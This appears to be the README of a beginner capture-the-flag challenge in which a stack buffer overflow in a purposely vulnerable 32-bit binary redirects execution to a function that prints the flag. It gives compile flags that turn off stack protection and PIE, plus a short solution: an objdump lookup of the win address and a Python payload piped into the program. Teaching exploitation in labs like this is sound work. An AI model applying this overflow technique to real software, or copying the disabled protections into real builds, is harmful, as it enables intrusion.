Jack the ROPper (Jack - @omnifocal1)

Very simple ROP

• Binary has a function that never gets called (which prints flag)
• Reverse and see:
  • Input with bad bounds checking
  • Address of a function that will perform a desired action (printing the flag)
• Overflow saved return address with address of flag-printing function
• Win!

How to compile

• On kali-rolling
• apt install libc6-dev-i386
• gcc -m32 -fno-stack-protector -fno-PIC -no-pie -o jtr jtr.c

How to win

• Read the SecTalks slides: jtr.key
• Read the challenge walkthrough:
  • Detailed: jtr_walkthrough.md
  • Short: jtr_walkthrough_short.md
• Note that if using radare2 you should install from git:
  • https://github.com/radare/radare2
• Or do it the quick way:
  • Find the starting address of the win function
    • objdump -t jtr | grep win
  • Copy the address in the first column and reverse byte order e.g.:
    • 0804849b g F .text 00000019 win
    • Becomes: 9b840408
  • Build command line to overflow buffer and blast the win address all over the stack :P
    • python -c 'print("\x9b\x84\x04\x08" * 100)'
  • Run it!:
    • python -c 'print("\x9b\x84\x04\x08" * 100)' | ./jtr